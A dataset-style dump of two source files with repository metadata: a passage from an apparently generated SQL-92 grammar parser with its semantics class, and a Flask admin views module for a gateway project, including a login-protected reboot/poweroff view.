with self._option():
self._collation_definition_()
with self._option():
self._translation_definition_()
with self._option():
self._assertion_definition_()
self._error('no available options')
@graken()
def _sql_schema_manipulation_statement_(self):
with self._choice():
with self._option():
self._drop_schema_statement_()
with self._option():
self._alter_table_statement_()
with self._option():
self._drop_table_statement_()
with self._option():
self._drop_view_statement_()
with self._option():
self._revoke_statement_()
with self._option():
self._alter_domain_statement_()
with self._option():
self._drop_domain_statement_()
with self._option():
self._drop_character_set_statement_()
with self._option():
self._drop_collation_statement_()
with self._option():
self._drop_translation_statement_()
with self._option():
self._drop_assertion_statement_()
self._error('no available options')
@graken()
def _sql_transaction_statement_(self):
with self._choice():
with self._option():
self._set_transaction_statement_()
with self._option():
self._set_constraints_mode_statement_()
with self._option():
self._commit_statement_()
with self._option():
self._rollback_statement_()
self._error('no available options')
@graken()
def _sql_connection_statement_(self):
with self._choice():
with self._option():
self._connect_statement_()
with self._option():
self._set_connection_statement_()
with self._option():
self._disconnect_statement_()
self._error('no available options')
@graken()
def _sql_session_statement_(self):
with self._choice():
with self._option():
self._set_catalog_statement_()
with self._option():
self._set_schema_statement_()
with self._option():
self._set_names_statement_()
with self._option():
self._set_session_authorization_identifier_statement_()
with self._option():
self._set_local_time_zone_statement_()
self._error('no available options')
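    # Query ordering and searched data manipulation statements (DELETE,
    # INSERT, UPDATE) follow.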
@graken()
def _order_by_clause_(self):
self._token('ORDER')
self._token('BY')
self._sort_specification_list_()
@graken()
def _sort_specification_list_(self):
def sep0():
self._token(',')
def block0():
self._sort_specification_()
self._positive_closure(block0, prefix=sep0)
@graken()
def _sort_specification_(self):
self._sort_key_()
with self._optional():
self._collate_clause_()
with self._optional():
self._ordering_specification_()
@graken()
def _sort_key_(self):
with self._choice():
with self._option():
self._identifier_()
with self._option():
self._unsigned_integer_()
self._error('no available options')
@graken()
def _ordering_specification_(self):
with self._choice():
with self._option():
self._token('ASC')
with self._option():
self._token('DESC')
self._error('expecting one of: ASC DESC')
@graken()
def _delete_statement_searched_(self):
self._token('DELETE')
self._token('FROM')
self._table_name_()
with self._optional():
self._token('WHERE')
self._search_condition_()
@graken()
def _insert_statement_(self):
self._token('INSERT')
self._token('INTO')
self._table_name_()
self._insert_columns_and_source_()
@graken()
def _insert_columns_and_source_(self):
with self._choice():
with self._option():
with self._optional():
self._left_paren_()
self._column_name_list_()
self._right_paren_()
self._query_expression_()
with self._option():
self._token('DEFAULT')
self._token('VALUES')
self._error('expecting one of: DEFAULT')
@graken()
def _set_clause_list_(self):
def sep0():
self._token(',')
def block0():
self._set_clause_()
self._positive_closure(block0, prefix=sep0)
@graken()
def _set_clause_(self):
self._identifier_()
self._equals_operator_()
self._update_source_()
@graken()
def _update_source_(self):
with self._choice():
with self._option():
self._value_expression_()
with self._option():
self._token('NULL')
with self._option():
self._token('DEFAULT')
self._error('expecting one of: DEFAULT NULL')
@graken()
def _update_statement_searched_(self):
self._token('UPDATE')
self._table_name_()
self._token('SET')
self._set_clause_list_()
with self._optional():
self._token('WHERE')
self._search_condition_()
@graken()
def _temporary_table_declaration_(self):
self._token('DECLARE')
self._token('LOCAL')
self._token('TEMPORARY')
self._token('TABLE')
self._qualified_local_table_name_()
self._table_element_list_()
with self._optional():
self._token('ON')
self._token('COMMIT')
with self._group():
with self._choice():
with self._option():
self._token('PRESERVE')
with self._option():
self._token('DELETE')
self._error('expecting one of: DELETE PRESERVE')
self._token('ROWS')
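    # Transaction, connection, and session management statements.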
@graken()
def _set_transaction_statement_(self):
self._token('SET')
self._token('TRANSACTION')
def sep0():
self._token(',')
def block0():
self._transaction_mode_()
self._positive_closure(block0, prefix=sep0)
@graken()
def _transaction_mode_(self):
with self._choice():
with self._option():
self._isolation_level_()
with self._option():
self._transaction_access_mode_()
with self._option():
self._diagnostics_size_()
self._error('no available options')
@graken()
def _transaction_access_mode_(self):
with self._choice():
with self._option():
self._token('READ')
self._token('ONLY')
with self._option():
self._token('READ')
self._token('WRITE')
self._error('expecting one of: READ')
@graken()
def _isolation_level_(self):
self._token('ISOLATION')
self._token('LEVEL')
self._level_of_isolation_()
@graken()
def _level_of_isolation_(self):
with self._choice():
with self._option():
self._token('READ')
self._token('UNCOMMITTED')
with self._option():
self._token('READ')
self._token('COMMITTED')
with self._option():
self._token('REPEATABLE')
self._token('READ')
with self._option():
self._token('SERIALIZABLE')
self._error('expecting one of: READ REPEATABLE SERIALIZABLE')
@graken()
def _diagnostics_size_(self):
self._token('DIAGNOSTICS')
self._token('SIZE')
self._simple_value_specification_()
@graken()
def _set_constraints_mode_statement_(self):
self._token('SET')
self._token('CONSTRAINTS')
self._constraint_name_list_()
with self._group():
with self._choice():
with self._option():
self._token('DEFERRED')
with self._option():
self._token('IMMEDIATE')
self._error('expecting one of: DEFERRED IMMEDIATE')
@graken()
def _constraint_name_list_(self):
with self._choice():
with self._option():
self._token('ALL')
with self._option():
def sep0():
self._token(',')
def block0():
self._schema_qualified_name_()
self._positive_closure(block0, prefix=sep0)
self._error('expecting one of: ALL')
@graken()
def _commit_statement_(self):
self._token('COMMIT')
with self._optional():
self._token('WORK')
@graken()
def _rollback_statement_(self):
self._token('ROLLBACK')
with self._optional():
self._token('WORK')
@graken()
def _connect_statement_(self):
self._token('CONNECT')
self._token('TO')
self._connection_target_()
@graken()
def _connection_target_(self):
with self._choice():
with self._option():
self._simple_value_specification_()
with self._optional():
self._token('AS')
self._connection_name_()
with self._optional():
self._token('USER')
self._simple_value_specification_()
with self._option():
self._token('DEFAULT')
self._error('expecting one of: DEFAULT')
@graken()
def _set_connection_statement_(self):
self._token('SET')
self._token('CONNECTION')
self._connection_object_()
@graken()
def _connection_object_(self):
with self._choice():
with self._option():
self._token('DEFAULT')
with self._option():
self._connection_name_()
self._error('expecting one of: DEFAULT')
@graken()
def _disconnect_statement_(self):
self._token('DISCONNECT')
self._disconnect_object_()
@graken()
def _disconnect_object_(self):
with self._choice():
with self._option():
self._connection_object_()
with self._option():
self._token('ALL')
with self._option():
self._token('CURRENT')
self._error('expecting one of: ALL CURRENT')
@graken()
def _set_catalog_statement_(self):
self._token('SET')
self._token('CATALOG')
self._value_specification_()
@graken()
def _set_schema_statement_(self):
self._token('SET')
self._token('SCHEMA')
self._value_specification_()
@graken()
def _set_names_statement_(self):
self._token('SET')
self._token('NAMES')
self._value_specification_()
@graken()
def _set_session_authorization_identifier_statement_(self):
self._token('SET')
self._token('SESSION')
self._token('AUTHORIZATION')
self._value_specification_()
@graken()
def _set_local_time_zone_statement_(self):
self._token('SET')
self._token('TIME')
self._token('ZONE')
self._set_time_zone_value_()
@graken()
def _set_time_zone_value_(self):
with self._choice():
with self._option():
self._interval_value_expression_()
with self._option():
self._token('LOCAL')
self._error('expecting one of: LOCAL')
@graken()
def _direct_sql_statement_(self):
self._directly_executable_statement_()
self._semicolon_()
@graken()
def _directly_executable_statement_(self):
with self._choice():
with self._option():
self._direct_sql_data_statement_()
with self._option():
self._sql_schema_statement_()
with self._option():
self._sql_transaction_statement_()
with self._option():
self._sql_connection_statement_()
with self._option():
self._sql_session_statement_()
self._error('no available options')
@graken()
def _direct_sql_data_statement_(self):
with self._choice():
with self._option():
self._delete_statement_searched_()
with self._option():
self._direct_select_statement_multiple_rows_()
with self._option():
self._insert_statement_()
with self._option():
self._update_statement_searched_()
with self._option():
self._temporary_table_declaration_()
self._error('no available options')
@graken()
def _direct_select_statement_multiple_rows_(self):
self._query_expression_()
with self._optional():
self._order_by_clause_()
@graken()
def _start_(self):
self._direct_sql_statement_()
self._check_eof()
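
# Usage sketch (an assumption, not part of the generated grammar): the parser
# class above can be driven directly from Python, optionally with a semantics
# object so each rule result is post-processed. The sample statement and
# keyword arguments below are illustrative only.
#
#     parser = SqlParser(parseinfo=False)
#     ast = parser.parse('COMMIT WORK;', 'start',
#                        semantics=SqlSemantics(), ignorecase=True)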
class SqlSemantics(object):
    def digit(self, ast):
        return ast
    def double_quote(self, ast):
        return ast
    def quote(self, ast):
        return ast
    def left_paren(self, ast):
        return ast
    def right_paren(self, ast):
        return ast
    def asterisk(self, ast):
        return ast
    def plus_sign(self, ast):
        return ast
    def comma(self, ast):
        return ast
    def minus_sign(self, ast):
        return ast
    def period(self, ast):
        return ast
    def solidus(self, ast):
        return ast
    def colon(self, ast):
        return ast
    def semicolon(self, ast):
        return ast
    def less_than_operator(self, ast):
        return ast
    def equals_operator(self, ast):
        return ast
    def greater_than_operator(self, ast):
        return ast
    def question_mark(self, ast):
        return ast
    def underscore(self, ast):
        return ast
    def regular_identifier(self, ast):
        return ast
    def delimited_identifier(self, ast):
        return ast
    def delimited_identifier_body(self, ast):
        return ast
    def not_equals_operator(self, ast):
        return ast
    def greater_than_or_equals_operator(self, ast):
        return ast
    def less_than_or_equals_operator(self, ast):
        return ast
    def concatenation_operator(self, ast):
        return ast
    def literal(self, ast):
        return ast
    def unsigned_literal(self, ast):
        return ast
    def general_literal(self, ast):
        return ast
    def character_string_literal(self, ast):
        return ast
    def character_representation(self, ast):
        return ast
    def national_character_string_literal(self, ast):
        return ast
    def bit_string_literal(self, ast):
        return ast
    def hex_string_literal(self, ast):
        return ast
    def bit(self, ast):
        return ast
    def hexit(self, ast):
        return ast
    def signed_numeric_literal(self, ast):
        return ast
    def unsigned_numeric_literal(self, ast):
        return ast
    def exact_numeric_literal(self, ast):
        return ast
    def sign(self, ast):
        return ast
    def approximate_numeric_literal(self, ast):
        return ast
    def signed_integer(self, ast):
        return ast
    def unsigned_integer(self, ast):
        return ast
    def datetime_literal(self, ast):
        return ast
    def date_literal(self, ast):
        return ast
    def time_literal(self, ast):
        return ast
    def timestamp_literal(self, ast):
        return ast
    def date_string(self, ast):
        return ast
    def time_string(self, ast):
        return ast
    def timestamp_string(self, ast):
        return ast
    def time_zone_interval(self, ast):
        return ast
    def date_value(self, ast):
        return ast
    def time_value(self, ast):
        return ast
    def interval_literal(self, ast):
        return ast
    def interval_string(self, ast):
        return ast
    def year_month_literal(self, ast):
        return ast
    def day_time_literal(self, ast):
        return ast
    def day_time_interval(self, ast):
        return ast
    def time_interval(self, ast):
        return ast
    def years_value(self, ast):
        return ast
    def months_value(self, ast):
        return ast
    def days_value(self, ast):
        return ast
    def hours_value(self, ast):
        return ast
    def minutes_value(self, ast):
        return ast
    def seconds_value(self, ast):
        return ast
    def datetime_value(self, ast):
        return ast
    def identifier(self, ast):
        return ast
    def identifier_list(self, ast):
        return ast
    def actual_identifier(self, ast):
        return ast
    def table_name(self, ast):
        return ast
    def qualified_local_table_name(self, ast):
        return ast
    def schema_name(self, ast):
        return ast
    def schema_qualified_name(self, ast):
        return ast
    def parameter_name(self, ast):
        return ast
    def character_set_name(self, ast):
        return ast
    def connection_name(self, ast):
        return ast
    def data_type(self, ast):
        return ast
    def character_string_type(self, ast):
        return ast
    def national_character_string_type(self, ast):
        return ast
    def bit_string_type(self, ast):
        return ast
    def numeric_type(self, ast):
        return ast
    def exact_numeric_type(self, ast):
        return ast
    def approximate_numeric_type(self, ast):
        return ast
    def length(self, ast):
        return ast
    def precision(self, ast):
        return ast
    def scale(self, ast):
        return ast
    def datetime_type(self, ast):
        return ast
    def interval_type(self, ast):
        return ast
    def value_specification(self, ast):
        return ast
    def unsigned_value_specification(self, ast):
        return ast
    def general_value_specification(self, ast):
        return ast
    def simple_value_specification(self, ast):
        return ast
    def parameter_specification(self, ast):
        return ast
    def indicator_parameter(self, ast):
        return ast
    def table_reference(self, ast):
        return ast
    def column_name_list(self, ast):
        return ast
    def column_reference(self, ast):
        return ast
    def qualifier(self, ast):
        return ast
    def set_function_specification(self, ast):
        return ast
    def general_set_function(self, ast):
        return ast
    def set_function_type(self, ast):
        return ast
    def set_quantifier(self, ast):
        return ast
    def numeric_value_function(self, ast):
        return ast
    def position_expression(self, ast):
        return ast
    def length_expression(self, ast):
        return ast
    def char_length_expression(self, ast):
        return ast
    def octet_length_expression(self, ast):
        return ast
    def bit_length_expression(self, ast):
        return ast
    def extract_expression(self, ast):
        return ast
    def extract_field(self, ast):
        return ast
    def time_zone_field(self, ast):
        return ast
    def extract_source(self, ast):
        return ast
    def string_value_function(self, ast):
        return ast
    def character_value_function(self, ast):
        return ast
    def character_substring_function(self, ast):
        return ast
    def fold(self, ast):
        return ast
    def form_of_use_conversion(self, ast):
        return ast
    def character_translation(self, ast):
        return ast
    def trim_function(self, ast):
        return ast
    def trim_operands(self, ast):
        return ast
    def trim_specification(self, ast):
        return ast
    def bit_substring_function(self, ast):
        return ast
    def start_position(self, ast):
        return ast
    def string_length(self, ast):
        return ast
    def datetime_value_function(self, ast):
        return ast
    def current_time_value_function(self, ast):
        return ast
    def current_timestamp_value_function(self, ast):
        return ast
    def case_expression(self, ast):
        return ast
    def case_abbreviation(self, ast):
        return ast
    def case_specification(self, ast):
        return ast
    def simple_case(self, ast):
        return ast
    def searched_case(self, ast):
        return ast
    def simple_when_clause(self, ast):
        return ast
    def searched_when_clause(self, ast):
        return ast
    def else_clause(self, ast):
        return ast
    def result(self, ast):
        return ast
    def cast_specification(self, ast):
        return ast
    def cast_operand(self, ast):
        return ast
    def cast_target(self, ast):
        return ast
    def value_expression(self, ast):
        return ast
    def value_expression_primary(self, ast):
        return ast
    def numeric_value_expression(self, ast):
        return ast
    def term(self, ast):
        return ast
    def factor(self, ast):
        return ast
    def numeric_primary(self, ast):
        return ast
    def string_value_expression(self, ast):
        return ast
    def character_value_expression(self, ast):
        return ast
    def concatenation(self, ast):
        return ast
    def character_factor(self, ast):
        return ast
    def character_primary(self, ast):
        return ast
    def bit_value_expression(self, ast):
        return ast
    def bit_concatenation(self, ast):
        return ast
    def bit_factor(self, ast):
        return ast
    def bit_primary(self, ast):
        return ast
    def datetime_value_expression(self, ast):
        return ast
    def datetime_term(self, ast):
        return ast
    def datetime_factor(self, ast):
        return ast
    def datetime_primary(self, ast):
        return ast
    def time_zone(self, ast):
        return ast
    def time_zone_specifier(self, ast):
        return ast
    def interval_value_expression(self, ast):
        return ast
    def interval_term(self, ast):
        return ast
    def interval_factor(self, ast):
        return ast
    def interval_primary(self, ast):
        return ast
    def interval_value_expression_1(self, ast):
        return ast
    def interval_term_1(self, ast):
        return ast
    def interval_term_2(self, ast):
        return ast
    def row_value_constructor(self, ast):
        return ast
    def row_value_constructor_list(self, ast):
        return ast
    def row_value_constructor_element(self, ast):
        return ast
    def table_value_constructor(self, ast):
        return ast
    def table_value_constructor_list(self, ast):
        return ast
    def table_expression(self, ast):
        return ast
    def from_clause(self, ast):
        return ast
    def joined_table(self, ast):
        return ast
    def cross_join(self, ast):
        return ast
    def qualified_join(self, ast):
        return ast
    def join_specification(self, ast):
        return ast
    def join_condition(self, ast):
        return ast
    def named_columns_join(self, ast):
        return ast
    def join_type(self, ast):
        return ast
    def outer_join_type(self, ast):
        return ast
    def where_clause(self, ast):
        return ast
    def group_by_clause(self, ast):
        return ast
    def grouping_column_reference_list(self, ast):
        return ast
    def grouping_column_reference(self, ast):
        return ast
    def having_clause(self, ast):
        return ast
    def query_specification(self, ast):
        return ast
    def select_list(self, ast):
        return ast
    def select_sublist(self, ast):
        return ast
    def derived_column(self, ast):
        return ast
    def as_clause(self, ast):
        return ast
    def query_expression(self, ast):
        return ast
    def non_join_query_expression(self, ast):
        return ast
    def query_term(self, ast):
        return ast
    def non_join_query_term(self, ast):
        return ast
    def query_primary(self, ast):
        return ast
    def non_join_query_primary(self, ast):
        return ast
    def simple_table(self, ast):
        return ast
    def explicit_table(self, ast):
        return ast
    def corresponding_spec(self, ast):
        return ast
    def subquery(self, ast):
        return ast
    def predicate(self, ast):
        return ast
    def comparison_predicate(self, ast):
        return ast
    def comp_op(self, ast):
        return ast
    def between_predicate(self, ast):
        return ast
    def in_predicate(self, ast):
        return ast
    def in_predicate_value(self, ast):
        return ast
    def in_value_list(self, ast):
        return ast
    def like_predicate(self, ast):
        return ast
    def null_predicate(self, ast):
        return ast
    def quantified_comparison_predicate(self, ast):
        return ast
    def quantifier(self, ast):
        return ast
    def some(self, ast):
        return ast
    def exists_predicate(self, ast):
        return ast
    def unique_predicate(self, ast):
        return ast
    def match_predicate(self, ast):
        return ast
    def overlaps_predicate(self, ast):
        return ast
    def search_condition(self, ast):
        return ast
    def boolean_term(self, ast):
        return ast
    def boolean_factor(self, ast):
        return ast
    def boolean_test(self, ast):
        return ast
    def truth_value(self, ast):
        return ast
    def boolean_primary(self, ast):
        return ast
    def interval_qualifier(self, ast):
        return ast
    def start_field(self, ast):
        return ast
    def end_field(self, ast):
        return ast
    def single_datetime_field(self, ast):
        return ast
    def datetime_field(self, ast):
        return ast
    def non_second_datetime_field(self, ast):
        return ast
    def privileges(self, ast):
        return ast
    def action_list(self, ast):
        return ast
    def action(self, ast):
        return ast
    def grantee(self, ast):
        return ast
    def collate_clause(self, ast):
        return ast
    def constraint_name_definition(self, ast):
        return ast
    def constraint_attributes(self, ast):
        return ast
    def constraint_check_time(self, ast):
        return ast
    def schema_definition(self, ast):
        return ast
    def schema_name_clause(self, ast):
        return ast
    def schema_character_set_specification(self, ast):
        return ast
    def schema_element(self, ast):
        return ast
    def drop_schema_statement(self, ast):
        return ast
    def drop_behavior(self, ast):
        return ast
    def table_definition(self, ast):
        return ast
    def table_element_list(self, ast):
        return ast
    def table_element(self, ast):
        return ast
    def column_definition(self, ast):
        return ast
    def column_constraint_definition(self, ast):
        return ast
    def column_constraint(self, ast):
        return ast
    def default_clause(self, ast):
        return ast
    def default_option(self, ast):
        return ast
    def table_constraint_definition(self, ast):
        return ast
    def table_constraint(self, ast):
        return ast
    def unique_constraint_definition(self, ast):
        return ast
    def unique_specification(self, ast):
        return ast
    def referential_constraint_definition(self, ast):
        return ast
    def references_specification(self, ast):
        return ast
    def match_type(self, ast):
        return ast
    def referenced_table_and_columns(self, ast):
        return ast
    def referential_triggered_action(self, ast):
        return ast
    def update_rule(self, ast):
        return ast
    def delete_rule(self, ast):
        return ast
    def referential_action(self, ast):
        return ast
    def check_constraint_definition(self, ast):
        return ast
    def alter_table_statement(self, ast):
        return ast
    def alter_table_action(self, ast):
        return ast
    def add_column_definition(self, ast):
        return ast
    def alter_column_definition(self, ast):
        return ast
    def alter_column_action(self, ast):
        return ast
    def set_column_default_clause(self, ast):
        return ast
    def drop_column_default_clause(self, ast):
        return ast
    def drop_column_definition(self, ast):
        return ast
    def add_table_constraint_definition(self, ast):
        return ast
    def drop_table_constraint_definition(self, ast):
        return ast
    def drop_table_statement(self, ast):
        return ast
    def view_definition(self, ast):
        return ast
    def levels_clause(self, ast):
        return ast
    def drop_view_statement(self, ast):
        return ast
    def domain_definition(self, ast):
        return ast
    def domain_constraint(self, ast):
        return ast
    def alter_domain_statement(self, ast):
        return ast
    def alter_domain_action(self, ast):
        return ast
    def set_domain_default_clause(self, ast):
        return ast
    def drop_domain_default_clause(self, ast):
        return ast
    def add_domain_constraint_definition(self, ast):
        return ast
    def drop_domain_constraint_definition(self, ast):
        return ast
    def drop_domain_statement(self, ast):
        return ast
    def character_set_definition(self, ast):
        return ast
    def character_set_source(self, ast):
        return ast
    def limited_collation_definition(self, ast):
        return ast
    def drop_character_set_statement(self, ast):
        return ast
    def collation_definition(self, ast):
        return ast
    def pad_attribute(self, ast):
        return ast
    def collation_source(self, ast):
        return ast
    def collating_sequence_definition(self, ast):
        return ast
    def translation_collation(self, ast):
        return ast
    def external_collation(self, ast):
        return ast
    def drop_collation_statement(self, ast):
        return ast
    def translation_definition(self, ast):
        return ast
    def translation_specification(self, ast):
        return ast
    def external_translation(self, ast):
        return ast
    def drop_translation_statement(self, ast):
        return ast
    def assertion_definition(self, ast):
        return ast
    def assertion_check(self, ast):
        return ast
    def drop_assertion_statement(self, ast):
        return ast
    def grant_statement(self, ast):
        return ast
    def object_name(self, ast):
        return ast
    def revoke_statement(self, ast):
        return ast
    def sql_schema_statement(self, ast):
        return ast
    def sql_schema_definition_statement(self, ast):
        return ast
    def sql_schema_manipulation_statement(self, ast):
        return ast
    def sql_transaction_statement(self, ast):
        return ast
    def sql_connection_statement(self, ast):
        return ast
    def sql_session_statement(self, ast):
        return ast
    def order_by_clause(self, ast):
        return ast
    def sort_specification_list(self, ast):
        return ast
    def sort_specification(self, ast):
        return ast
    def sort_key(self, ast):
        return ast
    def ordering_specification(self, ast):
        return ast
    def delete_statement_searched(self, ast):
        return ast
    def insert_statement(self, ast):
        return ast
    def insert_columns_and_source(self, ast):
        return ast
    def set_clause_list(self, ast):
        return ast
    def set_clause(self, ast):
        return ast
    def update_source(self, ast):
        return ast
    def update_statement_searched(self, ast):
        return ast
    def temporary_table_declaration(self, ast):
        return ast
    def set_transaction_statement(self, ast):
        return ast
    def transaction_mode(self, ast):
        return ast
    def transaction_access_mode(self, ast):
        return ast
    def isolation_level(self, ast):
        return ast
    def level_of_isolation(self, ast):
        return ast
    def diagnostics_size(self, ast):
        return ast
    def set_constraints_mode_statement(self, ast):
        return ast
    def constraint_name_list(self, ast):
        return ast
    def commit_statement(self, ast):
        return ast
    def rollback_statement(self, ast):
        return ast
    def connect_statement(self, ast):
        return ast
    def connection_target(self, ast):
        return ast
    def set_connection_statement(self, ast):
        return ast
    def connection_object(self, ast):
        return ast
    def disconnect_statement(self, ast):
        return ast
    def disconnect_object(self, ast):
        return ast
    def set_catalog_statement(self, ast):
        return ast
    def set_schema_statement(self, ast):
        return ast
    def set_names_statement(self, ast):
        return ast
    def set_session_authorization_identifier_statement(self, ast):
        return ast
    def set_local_time_zone_statement(self, ast):
        return ast
    def set_time_zone_value(self, ast):
        return ast
    def direct_sql_statement(self, ast):
        return ast
    def directly_executable_statement(self, ast):
        return ast
    def direct_sql_data_statement(self, ast):
        return ast
    def direct_select_statement_multiple_rows(self, ast):
        return ast
    def start(self, ast):
        return ast
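
# Sketch of how these pass-through actions are meant to be specialized (the
# subclass below is hypothetical, not part of the generated file): override
# only the rules you care about and return the transformed node.
#
#     class UpperCaseIdentifiers(SqlSemantics):
#         def regular_identifier(self, ast):
#             return ast.upper()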
def main(
        filename,
        startrule,
        trace=False,
        whitespace=None,
        nameguard=None,
        comments_re='/\\*[\\s\\S]*?\\*/',
        eol_comments_re='--.*?$',
        ignorecase=True,
        left_recursion=True,
        **kwargs):
    with open(filename) as f:
        text = f.read()
    whitespace = whitespace or '\\s+'
    parser = SqlParser(parseinfo=False)
    ast = parser.parse(
        text,
        startrule,
        filename=filename,
        trace=trace,
        whitespace=whitespace,
        nameguard=nameguard,
        ignorecase=ignorecase,
        **kwargs)
    return ast
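
# `main` can also be called programmatically rather than through the
# command-line entry point below; the file name here is hypothetical.
#
#     ast = main('query.sql', 'start', trace=False)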
if __name__ == '__main__':
    import json
    ast = generic_main(main, SqlParser, name='Sql')
    print('AST:')
    print(ast)
    print()
    print('JSON:')
    print(json.dumps(ast, indent=2))
    print()
|
mit
| 5,738,808,319,765,428,000
| 26.315351
| 93
| 0.502264
| false
| 4.589293
| false
| false
| false
|
procool/mygw
|
web/apps/admin/views.py
|
1
|
1195
|
import logging
import datetime

from sqlalchemy import func, and_, or_, not_
from flask import url_for

from misc.mixins import myTemplateView, JSONView
from utils.arp_list import get_mac_by_ip

from models.all_models import InetEther
# SQLAlchemy session; flask.session is deliberately not imported here,
# since it would be shadowed by this name.
from models.session import session

from utils.server.http_client import HTTPClient
from libs.pfctl import PFCtl

from auth import LoginRequiredMixin, LoginRequiredRedirectMixin


class adminView(LoginRequiredMixin, myTemplateView):
    template = 'admin/admin-ajax.tpl'


class statusView(LoginRequiredMixin, myTemplateView):
    template = 'admin/status-ajax.tpl'


class shutdownView(LoginRequiredMixin, JSONView):
    __ctlsrv = HTTPClient(port=6999)

    def get_context_data(self, **kwargs):
        context = super(shutdownView, self).get_context_data(**kwargs)
        # Anything other than 'poweroff' is treated as a reboot request.
        cmd = 'poweroff' if self.__cmd == 'poweroff' else 'reboot'
        r = self.__ctlsrv.call_handler('system/%s' % cmd)
        context['result'] = r
        return context

    def dispatch(self, request, command, *args, **kwargs):
        self.__cmd = command.lower()
        # super() already binds `self`; it must not be passed again.
        return super(shutdownView, self).dispatch(request, *args, **kwargs)
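
# Hypothetical wiring sketch (no URL map is defined in this file, and it is
# assumed the mixins build on flask.views.View): these class-based views
# would typically be registered on the application elsewhere, e.g.:
#
#     app.add_url_rule('/admin/', view_func=adminView.as_view('admin'))
#     app.add_url_rule('/admin/shutdown/<command>',
#                      view_func=shutdownView.as_view('shutdown'))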
|
bsd-2-clause
| 7,223,317,303,329,078,000
| 28.146341
| 81
| 0.706276
| false
| 3.757862
| false
| false
| false
|